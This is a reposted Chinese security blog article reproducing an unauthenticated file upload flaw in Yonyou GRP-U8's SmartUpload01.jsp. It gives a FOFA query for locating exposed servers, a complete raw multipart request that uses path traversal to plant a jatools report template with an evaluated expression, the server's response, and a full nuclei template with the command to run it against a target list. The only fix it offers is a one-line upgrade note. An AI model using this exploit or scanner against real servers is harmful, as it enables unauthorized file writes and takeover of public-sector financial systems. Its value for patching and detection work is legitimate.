【漏洞复现】用友GRP-U8 SmartUpload01 文件上传漏洞(附POC)

admin
admin
admin
138643
文章
114
评论
2023年12月25日22:18:22评论214 views字数 8206阅读27分21秒阅读模式


使


福利:小编整理了大量电子书和护网常用工具,在文末免费获取。


01

漏洞名称



用友GRP-U8 SmartUpload01 文件上传漏洞


02


漏洞影响


用友GRP-U8

【漏洞复现】用友GRP-U8 SmartUpload01 文件上传漏洞(附POC)



03


漏洞描述


用友GRP-U8行政事业内控管理软件是一款专门针对行政事业单位开发的内部控制管理系统,旨在提高内部控制的效率和准确性。该软件/u8qx/SmartUpload01.jsp接口存在文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。


04


FOFA搜索语句

app="用友-GRP-U8"

【漏洞复现】用友GRP-U8 SmartUpload01 文件上传漏洞(附POC)



05


漏洞复现


向靶场发送如下数据包,上传文件

POST /u8qx/SmartUpload01.jsp HTTP/1.1Host: x.x.x.xContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqtUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
------WebKitFormBoundaryzhvrkrqtContent-Disposition: form-data; name="uname"
../../../../../../../../../fljnyucrkvzycmtwbfiw------WebKitFormBoundaryzhvrkrqtContent-Disposition: form-data; name="input_localfile"; filename="fljnyucrkvzycmtwbfiw.pdf"
<jatools Class="jatools.ReportDocument" Name="jatools report template"><VariableContext></VariableContext><Page><Name>panel</Name><Children ItemClass="PagePanel"><Item0><Name>header</Name><Width>753</Width><Height>80</Height><Children ItemClass="Label"><Item0><Text>用一个Student对象,和其getMembers()方法,作成一个嵌套的表格dlvmwt</Text><ForeColor>-65536</ForeColor><X>41</X><Y>15</Y><Width>362</Width><Height>62</Height></Item0></Children><Type>100</Type></Item0><Item1><Name>footer</Name><Y>802</Y><Width>753</Width><Height>280</Height><Type>103</Type></Item1><Item2><Name>body</Name><Y>80</Y><Width>753</Width><Height>722</Height><Children ItemClass="Table"><Item0><NodePath>学生表</NodePath><X>115</X><Y>77</Y><Children><Item0 Class="Label"><Text>家庭成员</Text><Border/><PrintStyle>united-level:1;</PrintStyle><Cell><Row>3</Row><Col>0</Col><RowSpan>2</RowSpan></Cell></Item0><Item1 Class="Label"><Text>关系</Text><BackColor>-4144897</BackColor><Border/><Cell><Row>3</Row><Col>1</Col></Cell></Item1><Item2 Class="Label"><Text>性别</Text><BackColor>-4144897</BackColor><Border/><Cell><Row>3</Row><Col>2</Col></Cell></Item2><Item3 Class="Label"><Text>年龄</Text><BackColor>-4144897</BackColor><Border/><Cell><Row>3</Row><Col>3</Col></Cell></Item3><Item4 Class="Label"><Text>得分</Text><Border/><Cell><Row>2</Row><Col>0</Col></Cell></Item4><Item5 Class="Label"><Text>性别</Text><Border/><Cell><Row>1</Row><Col>0</Col></Cell></Item5><Item6 Class="Label"><Text>姓名</Text><Border/><Cell><Row>0</Row><Col>0</Col></Cell></Item6><Item7 Class="Text"><Variable>=$学生表</Variable><Border/><Cell><Row>0</Row><Col>1</Col><ColSpan>3</ColSpan></Cell></Item7><Item8 Class="Text"><Variable>=$学生表.value()</Variable><Border/><Cell><Row>1</Row><Col>1</Col><ColSpan>3</ColSpan></Cell></Item8><Item9 Class="Text"><Variable>=$学生表.getName()</Variable><Border/><Cell><Row>2</Row><Col>1</Col><ColSpan>3</ColSpan></Cell></Item9><Item10 Class="RowPanel"><Cell><Row>4</Row><Col>0</Col><ColSpan>4</ColSpan></Cell><Children ItemClass="Text"><Item0> <Variable></Variable><Border/><Cell><Row>4</Row><Col>3</Col></Cell></Item0><Item1><Variable></Variable><Border/><Cell><Row>4</Row><Col>2</Col></Cell></Item1><Item2><Variable>;</Variable><Border/><Cell><Row>4</Row><Col>1</Col></Cell></Item2></Children><NodePath>成员</NodePath></Item10></Children><ColumnWidths>60,60,60,60</ColumnWidths><RowHeights>20,20,20,20,20</RowHeights></Item0></Children><Type>102</Type></Item2></Children></Page><NodeSource><Children ItemClass="ArrayNodeSource"><Item0><Children ItemClass="ArrayNodeSource"><Item0><TagName>成员</TagName><Expression>$.value()</Expression></Item0></Children><TagName>学生表</TagName><Expression>new Object[]{123*123}</Expression></Item0></Children></NodeSource></jatools>------WebKitFormBoundaryzhvrkrqt--

响应内容如下

HTTP/1.1 200 OKDate: Mon, 25 Dec 2023 02:08:40 GMTServer: Apache-Coyote/1.1Set-Cookie: JSESSIONID=F5ABE2177546F4; Path=/; HttpOnlyContent-Type: text/html;charset=gbkContent-Length: 311


<html>  <head>    <title>SmartUpload</title>  </head>  <body>         <font color="red">图片名:../../../../../../../../../fljnyucrkvzycmtwbfiw.pdf</font><br>   <h2><img src="nullu8qxupload../../../../../../../../../fljnyucrkvzycmtwbfiw.pdf" width="200" height="300"></h2>  </body></html>

查看回显文件

http://x.x.x.x/jatoolsreport?file=/fljnyucrkvzycmtwbfiw.pdf&as=dhtml

【漏洞复现】用友GRP-U8 SmartUpload01 文件上传漏洞(附POC)


漏洞复现成功


06


nuclei poc


poc文件内容如下

id: yonyou-grp-u8-smartupload01-fileupload
info:  name: 用友 GRP u8 SmartUpload01 文件上传漏洞  author: fgz  severity: critical  description: 用友GRP-U8行政事业内控管理软件是一款专门针对行政事业单位开发的内部控制管理系统,旨在提高内部控制的效率和准确性。该软件/u8qx/SmartUpload01.jsp接口存在文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。  metadata:    max-request: 1    fofa-query: app="用友-GRP-U8"    verified: truevariables:  file_name: "{{to_lower(rand_text_alpha(8))}}"  rboundary: "{{to_lower(rand_text_alpha(8))}}"requests:  - raw:      - |+        POST /u8qx/SmartUpload01.jsp HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}        Accept-Encoding: gzip
        ------WebKitFormBoundary{{rboundary}}        Content-Disposition: form-data; name="uname"                ../../../../../../../../../{{file_name}}        ------WebKitFormBoundary{{rboundary}}        Content-Disposition: form-data; name="input_localfile"; filename="{{file_name}}.pdf"                <jatools Class="jatools.ReportDocument" Name="jatools report template">        <VariableContext>        </VariableContext>        <Page>        <Name>panel</Name>        <Children ItemClass="PagePanel">        <Item0>        <Name>header</Name>        <Width>753</Width>        <Height>80</Height>        <Children ItemClass="Label">        <Item0>        <Text>用一个Student对象,和其getMembers()方法,作成一个嵌套的表格dlvmwt</Text>        <ForeColor>-65536</ForeColor>        <X>41</X>        <Y>15</Y>        <Width>362</Width>        <Height>62</Height>        </Item0>        </Children>        <Type>100</Type>        </Item0>        <Item1>        <Name>footer</Name>        <Y>802</Y>        <Width>753</Width>        <Height>280</Height>        <Type>103</Type>        </Item1>        <Item2>        <Name>body</Name>        <Y>80</Y>        <Width>753</Width>        <Height>722</Height>        <Children ItemClass="Table">        <Item0>        <NodePath>学生表</NodePath>        <X>115</X>        <Y>77</Y>        <Children>        <Item0 Class="Label">        <Text>家庭成员</Text>        <Border/>        <PrintStyle>united-level:1;</PrintStyle>        <Cell>        <Row>3</Row>        <Col>0</Col>        <RowSpan>2</RowSpan>        </Cell>        </Item0>        <Item1 Class="Label">        <Text>关系</Text>        <BackColor>-4144897</BackColor>        <Border/>        <Cell>        <Row>3</Row>        <Col>1</Col>        </Cell>        </Item1>        <Item2 Class="Label">        <Text>性别</Text>        <BackColor>-4144897</BackColor>        <Border/>        <Cell>        <Row>3</Row>        <Col>2</Col>        </Cell>        </Item2>        <Item3 Class="Label">        <Text>年龄</Text>        <BackColor>-4144897</BackColor>        <Border/>        <Cell>        <Row>3</Row>        <Col>3</Col>        </Cell>        </Item3>        <Item4 Class="Label">        <Text>得分</Text>        <Border/>        <Cell>        <Row>2</Row>        <Col>0</Col>        </Cell>        </Item4>        <Item5 Class="Label">        <Text>性别</Text>        <Border/>        <Cell>        <Row>1</Row>        <Col>0</Col>        </Cell>        </Item5>        <Item6 Class="Label">        <Text>姓名</Text>        <Border/>        <Cell>        <Row>0</Row>        <Col>0</Col>        </Cell>        </Item6>        <Item7 Class="Text">        <Variable>=$学生表</Variable>        <Border/>        <Cell>        <Row>0</Row>        <Col>1</Col>        <ColSpan>3</ColSpan>        </Cell>        </Item7>        <Item8 Class="Text">        <Variable>=$学生表.value()</Variable>        <Border/>        <Cell>        <Row>1</Row>        <Col>1</Col>        <ColSpan>3</ColSpan>        </Cell>        </Item8>        <Item9 Class="Text">        <Variable>=$学生表.getName()</Variable>        <Border/>        <Cell>        <Row>2</Row>        <Col>1</Col>        <ColSpan>3</ColSpan>        </Cell>        </Item9>        <Item10 Class="RowPanel">        <Cell>        <Row>4</Row>        <Col>0</Col>        <ColSpan>4</ColSpan>        </Cell>        <Children ItemClass="Text">        <Item0> <Variable></Variable>        <Border/>        <Cell>        <Row>4</Row>        <Col>3</Col>        </Cell>        </Item0>        <Item1>        <Variable></Variable>        <Border/>        <Cell>        <Row>4</Row>        <Col>2</Col>        </Cell>        </Item1>        <Item2>        <Variable>;</Variable>        <Border/>        <Cell>        <Row>4</Row>        <Col>1</Col>        </Cell>        </Item2>        </Children>        <NodePath>成员</NodePath>        </Item10>        </Children>        <ColumnWidths>60,60,60,60</ColumnWidths>        <RowHeights>20,20,20,20,20</RowHeights>        </Item0>        </Children>        <Type>102</Type>        </Item2>        </Children>        </Page>        <NodeSource>        <Children ItemClass="ArrayNodeSource">        <Item0>        <Children ItemClass="ArrayNodeSource">        <Item0>        <TagName>成员</TagName>        <Expression>$.value()</Expression>        </Item0>        </Children>        <TagName>学生表</TagName>        <Expression>new Object[]{123*123}</Expression>        </Item0>        </Children>        </NodeSource>        </jatools>        ------WebKitFormBoundary{{rboundary}}--
      - |        GET /jatoolsreport?file=/{{file_name}}.pdf&as=dhtml HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15        Accept-Encoding: gzip
    matchers:      - type: dsl        dsl:          - "status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '15129') && contains(body_2, '<p class=')"

运行POC

nuclei.exe -t yonyou-grp-u8-smartupload01-fileupload.yaml -l 用友-GRP-U8.txt

【漏洞复现】用友GRP-U8 SmartUpload01 文件上传漏洞(附POC)



07


修复建议


升级到最新版本。


08


原文始发于微信公众号(AI与网安):【漏洞复现】用友GRP-U8 SmartUpload01 文件上传漏洞(附POC)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月25日22:18:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】用友GRP-U8 SmartUpload01 文件上传漏洞(附POC)https://cn-sec.com/archives/2332849.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息